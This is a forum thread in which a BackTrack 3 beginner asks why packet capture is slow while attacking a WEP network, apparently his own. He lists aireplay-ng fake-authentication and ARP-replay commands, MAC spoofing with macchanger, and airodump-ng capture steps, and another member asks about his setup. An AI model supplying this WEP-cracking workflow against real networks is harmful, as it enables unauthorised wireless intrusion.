Thread: aireplay-ng

Just burned his ISO

Default aireplay-ng

Hello, Im new to backtrack 3.

i recived a tut on how to start using bt3 from a friend and watched some videos on youtube. everything seems to be working but it takes fovereve to gather data. on youtube it suggeded trying to force some data backandforth by using he command

Code:
    aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55  -e eesid eth1
    after the first command it give me the assoc :-) sign which im told is good then to proceed to the next line

Code:
    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1
    which look like are a bunch of ARP request. the seem to to running just fine, the screen is scrolling and everything but whne i look back at the # data field nothing is happing. in the video it show the data just sky rocketing. mine just remains pretty slow.

any suggstions why or how to boost data packets?

thanks for your support.

-Mr. Trashcan

Edit: im running vmware with BT3 with a belkin f5d7050 adapter, just thaought i might add that

Very good friend of the forum Gitsnik's Avatar

What security do you have on your router (actually I think it is something a little more fundamental than that, but you know - for completeness sake). Also, make a list of every command you use that pertains to the wireless deal - that way we can see if you've missed something or not.
    Still not underestimating the power...

There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Just burned his ISO

I just double check and my network is running on wep

as I mentioned before I recive a very basic tut:

Code:
    1)airmon-ng stop eth1
    2)ifconfig eth1 down
    3)macchanger --mac 00:11:22:33:44:55 eth1
    4)airmon-ng start eth1
    5)airodump-ng eth1
    6)airodump-ng -c (channel) -w (file name) --BSSID (BSSID) eth1

to invoke more data faster
    7)aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55  -e eesid eth1